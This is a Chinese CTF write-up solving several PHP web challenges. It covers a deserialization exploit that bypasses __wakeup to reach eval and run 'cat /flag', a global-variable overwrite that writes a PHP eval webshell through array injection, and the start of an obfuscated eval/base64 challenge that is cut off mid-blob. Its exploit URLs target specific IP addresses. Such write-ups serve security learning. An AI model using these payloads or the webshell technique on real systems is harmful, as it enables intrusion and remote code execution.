Solution:

一道 php 反序列化题,源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(E_ERROR); 
ini_set("display_errors","Off");
highlight_file(__FILE__);
class yemoli {
    protected $alive;
    function __wakeup() {
        $this->alive = 'phpinfo();';
    }
    function __construct() {
        $this->alive = new good();
    }
    function __destruct() {
        $this->alive->action();
    }
}
class good {
    function action() {
        echo "I am a good boy!";
    }
}
class bad {
    private $code;
    function action() {
        eval($this->code);
    }
}
unserialize($_GET['string']);

要想使__wakeup函数失效执行下面的方法的话,只需要在写序列化的类内部调用方法个数时,大于它真正调用的个数即可

剩下就是正常操作

exp如下:

1
http://117.139.247.14:9759/index.php?string=O:6:"yemoli":2:{s:8:"%00*%00alive";O:3:"bad":1:{s:9:"%00bad%00code";s:20:"system("cat /flag");";}}

Flag:

1
动态靶机

Ez Code

Description:

Solution:

这漏洞网上能搜到,是一个覆盖全局变量的漏洞

根据提示yemoli is good at copying other people's code!!!

猜测到有备份文件,所以下载下来,下面是源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
error_reporting(E_ERROR); 
ini_set("display_errors","Off");
define('MAGIC_QUOTES_GPC', function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc());
echo "yemoli is good at copying other people's code!!!";
$yemoli = "yemoli is cool!!!";
function _RunMagicQuotes(&$svar) {
    if (!get_magic_quotes_gpc()) {
        if (is_array($svar)) {
            foreach ($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        } else {
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
function m_eregi($reg, $p) {
    $nreg = chgreg($reg) . "i";
    return preg_match(chgreg($reg) , $p);
}
function chgreg($reg) {
    $nreg = str_replace("/", "\\/", $reg);
    return "/" . $nreg . "/";
}
foreach ($_REQUEST as $_k => $_v) {
    if (strlen($_k) > 0 && m_eregi('^(GLOBALS)', $_k) && !isset($_COOKIE[$_k])) {
        exit('Hei Hacker!!!');
    }
}
foreach (Array(
    '_GET',
    '_POST',
    '_COOKIE'
) as $_request) {
    foreach ($$_request as $_k => $_v) $ {
        $_k
    } = _RunMagicQuotes($_v);
}
unlink('/var/www/html/yemoli.php');
file_put_contents('/var/www/html/yemoli.php', $GLOBALS['yemoli']);

接下来要了解的就是file_put_contents函数了,毕竟变量是随便覆盖的

file_put_contents函数:

file_put_contents()在写入文件时的第二个参数可以传入数组,如果是数组的话,将被连接成字符串再进行写入。

在正则匹配前,传入的是一个数组。得益于PHP的弱类型特性,数组会被强制转换成字符串

也就是Array,Array肯定是满足正则\A[_a-zA-Z0-9]+\z的,所以不会被拦截。

这样就可以绕过类似检测“<?”之类的waf

exp如下:

1
2
3
http://117.139.247.14:9553/index.php?yemoli[0]=<?&yemoli[1]=php eval($_POST[xbt]);?>

//再用菜刀或者蚁剑访问http://117.139.247.14:9553/yemoli.php即可

Flag:

1
动态靶机

Getshell

Description:

This site is terrible

Solution:

一上来是恶心的 php 代码混淆,源码如下:

1
2
3
4
5
6
7
8
9
 <?php
define('pfkzYUelxEGmVcdDNLTjXCSIgMBKOuHAFyRtaboqwJiQWvsZrPhn', __FILE__);
$cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{3} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{6} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{33} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{30};
$hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{33} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{10} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{24} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{10} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{24};
$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV = $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ{0} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{18} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{3} . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ{0} . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ{1} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{24};
$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{7} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{13};
$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC.= $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{22} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{36} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{29} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{26} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{30} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{32} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{35} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{26} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{30};
eval($BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC("JE52aXV5d0NlUFdFR2xhY0FtZmpyZ0JNVFlYekhacEl4RHFRbnNVS2tob3RGU09SZFZKTGI9IldBckllVEJFWFBaTlN0b3ppZ2hmcENPUlV2S0x5eFFubXdsR2NqYVZiRGtGdUpZZHNNSHF1d1dBZW1NVWhRb0NMYURma0Z4VEtsenRCWHJkT2liSEpqeU52WVNQcGNzSVpFR1JnblZxUWM5alNWd0ZvTlBKU3U1eXJsUjZTMkNzcHV5TlBJb3JMSUk1dnU5RFJVYU9wSHhmbVZSSmIwdGpQQnlvU3lFSXVzRUNQMmlidVU5MlJCNUhCMkV4b0JJVkVPaWpvSmE2dVBQeXBWeEl0MjF1RzJ0VW1zaUJTeXhjQjB5SG1CRWRtM1BBYkJvNUJIdHhHSjlpUjBLS0JQUjJ2MUtPQk54WnJtZ3NieW96R3NDWVNKOWlHdTUxdnlJeVNVeUh0QjlhbVVSU21QUDZlUHQ0QlZDMFMzUk1SSm9qQjBhTHVOaXJTdXRodFVvb0xjMTF2Smlzb3VDWG9OQkRBa0IydG1VeUMwVXlDWUF5bnNHeUNzYnlDWVUxRW1QY0VtdjJFbXYwbmxCMnptQTRFbUVVRW12akVtdjRFbXYxRW12aUVtdjVFbUVNQ2tCMmJPQjNua0IyYmtCMkNsQjJDZnN5Q0JHeUNZQnlDWUZ5Q1lueUNmbnlDZnZ5Q3NHMEVtRWxFbUcybmZ2eUNzVWtybWdzR2h5enZ1NXlwM0VVTFZ4TmJ5QzNHMGFEbU5LckJWdFFTQkNKdUJJSHVIb2twSXhQQnl0aFBKMWp0QjF0dDJhNkx1dGZSbTBzYnlvekdzQ1lTSjlpR3U1MXZ5SXlTVXlIdEI5YW1VUlNtUFA2ZVB0NEJWQzBTM1JNUkpvakIwYUx1TmlyU3V0aHRVb29MVmdmVEw0c2J5b3pHc0NZU0o5aUd1NTF2eUl5U1V5SHRCOWFtVVJTbVBQNmVQdDRCVkMwUzNSTVJKb2pCMGFMdU5pclN1dGh0VW9vTFZnMlRMNHNieW96R3NDWVNKOWlHdTUxdnlJeVNVeUh0QjlhbVVSU21QUDZlUHQ0QlZDMFMzUk1SSm9qQjBhTHVOaXJTdXRodFVvb0xWZ2ZuMzBaRVVFdW1KRWNHMktYdnVJWlJoRXRvdXhFbzBQUXBCaVZ1czFQZUh5QmVJTWZSTmEzYmhvSnZJQ2RCeXhnTEp5c1AwdE51Qng3bmZNOXpPdG90MUtBUkp5amIzUDZtMW9pdnlSQkJCb2dvSHlsTGh0YnYyeGtHM3h5THMxZEdCUEdwMjEzQkpSWlB1YW1vVUlubXN0cVFMdGxQczVrYjJDcXAzSXhwSFBPQnVQREx1UkltMjFudDFLQ1BoSzVQVnhidjN0V1IwSTJvSE1tTDFFR3BVS0tvSVJVdHl5QWVmbmZUTDRzYnlvekdzQ1lTSjlpR3U1MXZ5SXlTVXlIdEI5YW1VUlNtUFA2ZVB0NEJWQzBTM1JNUkpvakIwYUx1TmlyU3V0aHRVb29MVmdpblYwWkVVRXVtSkVjRzJLWHZ1SVpSaEV0b3V4RW8wUFFwQmlWdXMxUGVIeUJlSU1mUk5hM2Job0p2SUNkQnl4Z0xKeXNQMHROdUJ4N25ZdDlka3RsUHM1a2IyQ3FwM0l4cEhQT0J1UERMdVJJbTIxbnQxS0NQaEs1UFZ4YnYzdFdSMEkyb0hNbUwxRUdwVUtLb0lSVXR5eUFlZlVqVEw0c2J5b3pHc0NZU0o5aUd1NTF2eUl5U1V5SHRCOWFtVVJTbVBQNmVQdDRCVkMwUzNSTVJKb2pCMGFMdU5pclN1dGh0VW9vTFZnT0NWMDdFSXRzdlUxclMyeEd0aElTbUpDYkdoeGtlQmFodDNLdVJOUEhCdTVPdUJpUXRKeTFTc3RjcEJ4THBWUk1iSjlQTGhvbXYyRzlFSXlWdXN4MlNoTWNSaEtRUEhJT1AxdHR0SmlKZUJFRVJJTWZTTkVZZU5Qcm1CYXh0UHhYcGhSTG8yNVBTMUNzYkJpenROSzduVjBaRVVFdW1KRWNHMktYdnVJWlJoRXRvdXhFbzBQUXBCaVZ1czFQZUh5QmVJTWZSTmEzYmhvSnZJQ2RCeXhnTEp5c1AwdE51Qng3bm14OWRrdGxQczVrYjJDcXAzSXhwSFBPQnVQREx1UkltMjFudDFLQ1BoSzVQVnhidjN0V1IwSTJvSE1tTDFFR3BVS0tvSVJVdHl5QWVmQzlka3RvdDFLQVJKeWpiM1A2bTFvaXZ5UkJCQm9nb0h5bExodGJ2MnhrRzN4eUxzMWRHQlBHcDIxM0JKUlpQdWFtb1VJbm1zdHFlZk05ZGt0b3QxS0FSSnlqYjNQNm0xb2l2eVJCQkJvZ29IeWxMaHRidjJ4a0czeHlMczFkR0JQR3AyMTNCSlJaUHVhbW9VSW5tc3RxZWZJOWRrdGxQczVrYjJDcXAzSXhwSFBPQnVQREx1UkltMjFudDFLQ1BoSzVQVnhidjN0V1IwSTJvSE1tTDFFR3BVS0tvSVJVdHl5QWVmQTBUbWdzdjNLeUcyMW9SdUlPcFZ4TlBCeWhldTlrUk5vWm1VNXJCUHRjdFZvYlMxb210MHhIdFBLS3VOeFFtQmEzdlVFc2J1S2lCWTBzYnlvekdzQ1lTSjlpR3U1MXZ5SXlTVXlIdEI5YW1VUlNtUFA2ZVB0NEJWQzBTM1JNUkpvakIwYUx1TmlyU3V0aHRVb29MVmczVEw0c2J5b3pHc0NZU0o5aUd1NTF2eUl5U1V5SHRCOWFtVVJTbVBQNmVQdDRCVkMwUzNSTVJKb2pCMGFMdU5pclN1dGh0VW9vTFZnaW4zMDdFTkk1bUhJWm91OU90VXg0dHNFbVIyQ2RTVWlxTHlNMG0yeWNveXlNbzFLMkdKaUdQUEVCUDFvYXZVUENCQlJXZXN5c3YzQlpRTHRsUHM1a2IyQ3FwM0l4cEhQT0J1UERMdVJJbTIxbnQxS0NQaEs1UFZ4YnYzdFdSMEkyb0hNbUwxRUdwVUtLb0lSVXR5eUFlZkFPVEw0c2J5b3pHc0NZU0o5aUd1NTF2eUl5U1V5SHRCOWFtVVJTbVBQNmVQdDRCVkMwUzNSTVJKb2pCMGFMdU5pclN1dGh0VW9vTFZnZkNIMFpFVUV1bUpFY0cyS1h2dUlaUmhFdG91eEVvMFBRcEJpVnVzMVBlSHlCZUlNZlJOYTNiaG9KdklDZEJ5eGdMSnlzUDB0TnVCeDduWXk5ZGt0bFBzNWtiMkNxcDNJeHBIUE9CdVBETHVSSW0yMW50MUtDUGhLNVBWeGJ2M3RXUjBJMm9ITW1MMUVHcFVLS29JUlV0eXlBZWZBMlRMNHNieW96R3NDWVNKOWlHdTUxdnlJeVNVeUh0QjlhbVVSU21QUDZlUHQ0QlZDMFMzUk1SSm9qQjBhTHVOaXJTdXRodFVvb0xWZ2ZuVjBaRVVFdW1KRWNHMktYdnVJWlJoRXRvdXhFbzBQUXBCaVZ1czFQZUh5QmVJTWZSTmEzYmhvSnZJQ2RCeXhnTEp5c1AwdE51Qng3bmZFOWRrdGxQczVrYjJDcXAzSXhwSFBPQnVQREx1UkltMjFudDFLQ1BoSzVQVnhidjN0V1IwSTJvSE1tTDFFR3BVS0tvSVJVdHl5QWVmbjFUTDRzYnlvekdzQ1lTSjlpR3U1MXZ5SXlTVXlIdEI5YW1VUlNtUFA2ZVB0NEJWQzBTM1JNUkpvakIwYUx1TmlyU3V0aHRVb29MVmdPQ0gwWkVVRXVtSkVjRzJLWHZ1SVpSaEV0b3V4RW8wUFFwQmlWdXMxUGVIeUJlSU1mUk5hM2Job0p2SUNkQnl4Z0xKeXNQMHROdUJ4N25mTTl6MlAyR3VqREVOSTVtSElab3U5T3RVeDR0c0VtUjJDZFNVaXFMeU0wbTJ5Y295eU1vMUsyR0ppR1BQRUJQMW9hdlVQQ0JCUldlc3lzdjNCREFzS0l1czl4TElLeEJZTWpweW9ndHlva3VWTTVHMFI0dlBLR3RIRUJudWl6UG1NZ1NQb0FCSG9ZblZ0Q0J1NURCMUdPdHN5eFBCNXFCeVBMblBLTlNVRXNuQkExdUowMHpCeWd2VlB5cHlLNUJzUnVleUNocFU1a1BCb2RQQlB6bklvWmJ5eXNuQjVMQllFTnYxb1BlTjl1bll5V29QUnp0MUV1Qll0U251aml1dWlyYjFDSVJJTXhuY1BpdUo1TmV5eXVMc2F5UEppNFBjTTBTeW9HTEh0dW5VR09Hc1JycHlLV25QSUxTMngyb2NDTHAySWd1SmF4UHlFckcwb0RiMUVoQ1BFaHBITUJQVXh1TE5Vam1zUFNQbUIwQlBvV0NQdGh6bUlrUGZQbFB1S3R6QnlxUk5pc3BCb2ZMMENZZDFNS0czUHJ0MEcxUE41TlJQS2h6aHlMdHVGMEJKYXJQTmJPbXNpeHRoeGlCMmlsbkliT3BVdFNwTmlsdVlJam55eWFlSXl1UHNLUFBZSVNSTkNJUHM1UFB1dE9vdWFnUzJuZlB1OXJ0SmlBUDJhRG5KSUdic3RzdVZNYlBKNU5lUEdpQnlFTHBoeGFvUFByTEp0TmJIS3h0MEtxb0JSdUwxdFBSTnhMUEp4Mkd5eHNCMURPQ1BveG5CNVdCUFA0bTFFVnAyOXJ0eUVXRzBCaUwyVU9TSXlMdVVveFBOMXpCUHlHU055eVBodEdCWUNqUDJ0VlBKNVBQZlA1UDFQNEJJRWFwY0l4UzFFVUd5UERCMkVBb1VFdHBteXVCMXhTUE5uT3V1OXJ0UEtRR0J4U0dQQWp2TjV1cFVvdUd5eGpldUNWZVZJU3VVb09QY0lnbXlCanBOeXVMSUUyR2ZNMG1QSVpTSUN1bnNvRUdQUHpTeUVQQllJU3RKeGxvY0lsQ1BLYUNWQ3JMVTQydXlSelJJUkdQSnhZcGhGMEJKaXVMeUdmcFZvb3B5RWFHSmE0bTFDZ3R5UHRuSUFPUEJSMFAxQmpvVXlTbklveEdQb0RwMWJqbkJpc24wRWN1c1BOdnVDdUxoSUNTdWFmTHNvTFMyQ0luQmF4bkp4b0J5eE5HUHRhbXlJb3VOeEtvUFAwdUlBZnZJUnN0MW9aUFB2MWVQUlBlSU1McHVqaUd1YUx0TkVQU0lDa0xOdGxCdTA1UHlDR3V5dFlueXlYTHNQU20ySUF1SklMblZNWlBKaU5QSkVHdlZ5WXQzeGl1eXhOdnliaXBVNVBuTmlLUHN4TFJKbmpSVTF0cEp4bVBZRU5MdUlQbUpLTFBQQWl1c29EYkpiaWJZUFNwbXRmTHN4ekN5S2htSHRodUlvREcyMTRDSUVnUHNLdW4yaTJ1dTVMcHVFV2VVOW1wVW9QQm1NTG55UFZSSVJQbk50RXVZTXVHdUl1U045Qm5jSW5vY0NsYjFLSXRISVlQc3lmTHN4ekN5S2htSHRodUlvREcyMTRDSUVnUHNLdW4yaTJ1dTVMcHVFV2VVOW1wVW9QQm1NTG55UFZSSVJQbk50RXVZTXVHdUl1U045Qm5jSW5vY0NsYjFLSXRISVlQc3lqbVVDTFBQS0FiczVtcGh0WFAwUHVlSVJXQ3VLUHQwRzB1dTVnbUlHam9jb3VweUVndVlJTlJ1Q2dwVTFCbklLam9JUmp0UFVPbkJ5UHBoRmZCUFByUnlvUHBjRVBuMDVhTDBDTHQxdGFTY0VoUzJ0ZHVZSVNCeW9obm1vWXBzRWZHdTF1ZU5VanpQS0JQczVydXVpTG5OQWZtc2lCdEJEMFB1aXNTSUNWcFV0b25Jb0lvSVJMdVBJR29JSXlQMUsxbVV0TXYwS0FtWW9TUDA1MFAxeHVTTkNhZWN0THBJb3JQWUNnUnl5WkJKMWtTM3hRQjJpTlBQVWpCWUVQdDN0aFBtTXNMUERqUEpJeFBKeFhQY3dpbU5iZmJzQ1N0Qm9pRzFvRXZVYW1TM01RUmYwOUFrc0t6ZjgrUWM5alNWd0ZvTlBKU3U1eXJsUlpTeW81djBFU1JIeE9tTmFOdXV0enAyb1lvMFIxR2hSVUxKRWd2VTltQkJQQUJ5UGFMMnlNU1ZLRWIyUDBCVTFpdUlSQkVPaWpvSmE2dVBQeXBWeEl0MjF1RzJ0VW1zaUJTeXhjQjB5SG1CRWRtM1BBYkJvNUJIdHhHSjlpUjBLS0JQUjJ2MUtPQk54WnJtZ3NtMmladE5hNm1KUGlSSktkcFB5RG1CRUVCM3hyYjNQU295SUxSMGloTFVSTnYzdFBHMElYdUlvNXZKRUt0UHRiR3V0SHZjMTF2Smlzb3VDWG9OQkRBa0IydG1VeUMwVXlDWUF5bnNHeUNzYnlDWVUxRW1QY0VtdjJFbXYwbmxCMnptQTRFbUVVRW12akVtdjRFbXYxRW12aUVtdjVFbUVNQ2tCMmJPQjNua0IyYmtCMkNsQjJDZnN5Q0JHeUNZQnlDWUZ5Q1lueUNmbnlDZnZ5Q3NHMEVtRWxFbUcybmZ2eUNzVWtybWdzTE5FR29WdFZQdWF5dEJ0Z0JKUmpSM0N4dkpvWlB5eVhQSUNkTHVDYlJKeGNQMktsU2hLdG1JSzR0czExZXUxTW1ISXJtZjBzbTJpWnROYTZtSlBpUkpLZHBQeURtQkVFQjN4cmIzUFNveUlMUjBpaExVUk52M3RQRzBJWHVJbzV2SkVLdFB0Ykd1dEh2VmdmVEw0c20yaVp0TmE2bUpQaVJKS2RwUHlEbUJFRUIzeHJiM1BTb3lJTFIwaWhMVVJOdjN0UEcwSVh1SW81dkpFS3RQdGJHdXRIdlZnMlRMNHNtMmladE5hNm1KUGlSSktkcFB5RG1CRUVCM3hyYjNQU295SUxSMGloTFVSTnYzdFBHMElYdUlvNXZKRUt0UHRiR3V0SHZWZ2ZuMzBaRVU5Z3BzdFdlczV5dmhvcUwyMW9TVTFsTFBDNExzQzF1Sm90QkhSblAweFZ0SEMwUHVDTXAxeHVlaEVrU0JQQkJOSXNvM003bmZNOXpPdEVwMkN5YjI1aVBzYVF0SmFPcElFcVBQTUlvVTVEYmhQbW1CS2xlSjFWUnl0bmVodEt2MlJqdXl5a0JQeEFvc3QzUDN4eFFMdFFwTjVVUzNLem9oSTJTc2FhdXV4Q2JzeW1lVUtjUlBLSkJQRTNtSVJBdDBvZlJJUFlidTlHUEh5T0dKeUlQSU14b05SamVmbmZUTDRzbTJpWnROYTZtSlBpUkpLZHBQeURtQkVFQjN4cmIzUFNveUlMUjBpaExVUk52M3RQRzBJWHVJbzV2SkVLdFB0Ykd1dEh2VmdpblYwWkVVOWdwc3RXZXM1eXZob3FMMjFvU1UxbExQQzRMc0MxdUpvdEJIUm5QMHhWdEhDMFB1Q01wMXh1ZWhFa1NCUEJCTklzbzNNN25ZdDlka3RRcE41VVMzS3pvaEkyU3NhYXV1eENic3ltZVVLY1JQS0pCUEUzbUlSQXQwb2ZSSVBZYnU5R1BIeU9HSnlJUElNeG9OUmplZlVqVEw0c20yaVp0TmE2bUpQaVJKS2RwUHlEbUJFRUIzeHJiM1BTb3lJTFIwaWhMVVJOdjN0UEcwSVh1SW81dkpFS3RQdGJHdXRIdlZnT0NWMDdFVXRZR0h5Ym1ITW9CMGExdEJDMm91YUVQeUtnbTFJTlBVMTNvMXhLcHNJSkd1OUFvVktpU1VSaEJIRW52MjFyYkpLUFJWRjlFVXlYRzJQY3BISXVMMDlOUzNFZ0JKS1BCVVBzbUp4TVJQQ0NMc0U2cEJSMlBVaTVSTnlmbzNNU3V1RXR1VXhKdFZSaGVOSTduVjBaRVU5Z3BzdFdlczV5dmhvcUwyMW9TVTFsTFBDNExzQzF1Sm90QkhSblAweFZ0SEMwUHVDTXAxeHVlaEVrU0JQQkJOSXNvM003bm14OWRrdFFwTjVVUzNLem9oSTJTc2FhdXV4Q2JzeW1lVUtjUlBLSkJQRTNtSVJBdDBvZlJJUFlidTlHUEh5T0dKeUlQSU14b05SamVmQzlka3RFcDJDeWIyNWlQc2FRdEphT3BJRXFQUE1Jb1U1RGJoUG1tQktsZUoxVlJ5dG5laHRLdjJSanV5eWtCUHhBb3N0M1AzeHhlZk05ZGt0RXAyQ3liMjVpUHNhUXRKYU9wSUVxUFBNSW9VNURiaFBtbUJLbGVKMVZSeXRuZWh0S3YyUmp1eXlrQlB4QW9zdDNQM3h4ZWZJOWRrdFFwTjVVUzNLem9oSTJTc2FhdXV4Q2JzeW1lVUtjUlBLSkJQRTNtSVJBdDBvZlJJUFlidTlHUEh5T0dKeUlQSU14b05SamVmQTBUbWdzUzJDM0wyRW1vMnhoU2hLb3RoUE10MHRRUFVveExJeHRCSHRabVZ5bHBVS2piMHlhb3VLZnZzNTJ1SEliUFBvNG9zMXNwZjBzbTJpWnROYTZtSlBpUkpLZHBQeURtQkVFQjN4cmIzUFNveUlMUjBpaExVUk52M3RQRzBJWHVJbzV2SkVLdFB0Ykd1dEh2VmczVEw0c20yaVp0TmE2bUpQaVJKS2RwUHlEbUJFRUIzeHJiM1BTb3lJTFIwaWhMVVJOdjN0UEcwSVh1SW81dkpFS3RQdGJHdXRIdlZnaW4zMDdFVXhrdU50MHQxUFdvQlBVcElFSHZWUmZHaEVKcHlvb3AxdG1MMHlZQlZvRGIxUnFiSnk2QkJpU2VVb0NSaHlhYkI1aUxzOFpRTHRRcE41VVMzS3pvaEkyU3NhYXV1eENic3ltZVVLY1JQS0pCUEUzbUlSQXQwb2ZSSVBZYnU5R1BIeU9HSnlJUElNeG9OUmplZkFPVEw0c20yaVp0TmE2bUpQaVJKS2RwUHlEbUJFRUIzeHJiM1BTb3lJTFIwaWhMVVJOdjN0UEcwSVh1SW81dkpFS3RQdGJHdXRIdlZnZkNIMFpFVTlncHN0V2VzNXl2aG9xTDIxb1NVMWxMUEM0THNDMXVKb3RCSFJuUDB4VnRIQzBQdUNNcDF4dWVoRWtTQlBCQk5Jc28zTTduWXk5ZGt0UXBONVVTM0t6b2hJMlNzYWF1dXhDYnN5bWVVS2NSUEtKQlBFM21JUkF0MG9mUklQWWJ1OUdQSHlPR0p5SVBJTXhvTlJqZWZBMlRMNHNtMmladE5hNm1KUGlSSktkcFB5RG1CRUVCM3hyYjNQU295SUxSMGloTFVSTnYzdFBHMElYdUlvNXZKRUt0UHRiR3V0SHZWZ2ZuVjBaRVU5Z3BzdFdlczV5dmhvcUwyMW9TVTFsTFBDNExzQzF1Sm90QkhSblAweFZ0SEMwUHVDTXAxeHVlaEVrU0JQQkJOSXNvM003bmZFOWRrdFFwTjVVUzNLem9oSTJTc2FhdXV4Q2JzeW1lVUtjUlBLSkJQRTNtSVJBdDBvZlJJUFlidTlHUEh5T0dKeUlQSU14b05SamVmbjFUTDRzbTJpWnROYTZtSlBpUkpLZHBQeURtQkVFQjN4cmIzUFNveUlMUjBpaExVUk52M3RQRzBJWHVJbzV2SkVLdFB0Ykd1dEh2VmdPQ0gwWkVVOWdwc3RXZXM1eXZob3FMMjFvU1UxbExQQzRMc0MxdUpvdEJIUm5QMHhWdEhDMFB1Q01wMXh1ZWhFa1NCUEJCTklzbzNNN25mTTl6MlAyR3VqREVVeGt1TnQwdDFQV29CUFVwSUVIdlZSZkdoRUpweW9vcDF0bUwweVlCVm9EYjFScWJKeTZCQmlTZVVvQ1JoeWFiQjVpTHM4REFzS0lTTjFzUHM1WlBJUHJCTlBWU1Zvc3BzRGpHSjBpdUpQYVJJb0xuSUtOUDI1enZJRU5TY1BtUzJpZnV1YTB0SUdPdlZSdVMzeHRQc3hzU0pDaFBKeEJTMG9tdXNvSXpCeWdvY010bjJ4NkcxUHVuUHRJQ1BQUG5OdG1HbUlTcFBSV1JVeXhwSW9TUEJQZ1J5RE9DQkN4UFBLWEcyMXJDUGJpU054b25Vb2dHc3ZpbjJDSXZOYXlweUtMQnNCaXQxeWdMeUtrUzN4Z1BZQ3VMSW9JUlZLQnBWd09QY0NsU3lEalBIeXN0Snhjb0JQekJKRVZ2SVJTUzFBZlBtQWlDdUNQU1ZNeG5CRXpvdTFMTDF5UHBWb3RQMnh1UDBSSEN1UFp0SjV4UHV0bVBJUlNTMkNVTEoxa3Bzb1Z1UHhEU0lvcXBVNVlQUEtTUEJSemVzNVBlY0VQUHNFckJQb2xTMDFhUk41bXBJbzRtQnhsUjJDVlBtSWtuMEV6QllJTm0wMGZ1SjFvUFVFUXVtQ0xteVJHdklQQ1B1dFFQTjVycFBuZnVzUkN1SW80RzJpU0NOVWl2SUl4TFVBMVBOYU5QdVB1dVlNc1Nzb2x1c3ZpQ3MxVm1zRVluMXk1b1VQU0NKUEl2SVJRUEJvUG1QUHNlUEVxbXlJb3BKdDZQQlBnZU5QUG9OYW10VUt0R1lDWWVQeWF0Skt1dGZiNUx1SzBwTnRhdEhDZGIyblhCTnlZUkJLSVNOeWh0MUFqQllJdXZ5S1BQc1BrdHNLWkcweHNleXlHTEoxa3BJS1NHWUlMUEluanBOS1BMSUtYQm1Jc3ZQSWFwY29QUGh4eG9CUFNtSnRHcFZ0dFBtUDRCMmc0cDBLSXBWb29ueW9VR0o1TlAxbmp6QlJ4bjBLZlB1MWpQeVBJUEphQnB1eGxvSW96bXlDV0xZb2tQdWJPUHNQNEN1dFZwVktTbjBFeFAxUnJCeVJJU04xTExOdEdvQlJJcDBLSUJKS29wSml0UE41bHV5QmpSY0lMUEI0T3V5UjBMeW9ndlZDQm5Cb1ZQc0JpbjFEaVNWTWtTMG9hdVB2NUxQS0F2Vnh4dHV0R1B1NXJtdW5PbkJhdHBoTXVvVXhIcDBLSVNOMXNQczVaUElQckJOUFZTVm9zcHNEakdKMGl1SlBhUklvTG5JS05QMjV6dklFTlNjUG1TMmlmdXVhMHRJR092VlJ1UzN4dFBzeHNTSkNoUEp4QlMwb211c29JdjBLVlJOS3NuVnRLUG1Fc3AxR09wY29oUFBHaUJQUHN0UGJpQnNSb1B1eG9QUG9ybk5FV2VjUHRwaHhkRzBQekxKRWhQSElZbjBLUW9OaWplSVBOUHlSeXQxS3p1c3Y0dkIxS1MzQ3J0UEVxdXU1Z0JQdFpieUtQblZiaUJ5UHpueUtoUlVLdXBWTWZQY0lOdDFvSW5tQ1NudXhqR0phTnBQeWh6QnlTTFZNNEdCUHN1SVBaTHMxWW5ZSWRCdTFqUEp0QW8yOXJ0dXhhb0lvenB5dFBMeU15dDJ4Mm9ONXJuTkVhblBLeXBodHVCWU1TdHlSWm1ITUx0SkYxQjJhZ3YxeVdSVXR1bkhNM1BKYTRCUG9Bb05LWVAxb0RQTmFOQjFLTnRoQ3J0M3Rxb2NNMFNQQk9vTjl1bkpqMlAxUHVuUElQb1VQQm5QRVZ1UFBEdVBQdUxZTWtTM0YxQnUxNEwyQ0ltc0trUDFvaUdmQ3JtMnRndlZ4UHR5b2hvQlJTbXlLVnpWQ3J0M3Rxb2NNMFNQQk9vTjl1bkpqMlAxUHVuUElQb1VQQm5QRVZ1UFBEdVBQdUxZTWtTM0YxQnUxNEwyQ0ltc0trUDFvaUdmQ3JtMnRndlZ4UHR5b2hvQlJTbXlLVnpWTW5iMUVJdW1FckNQUElDaFJoUHM1bm9J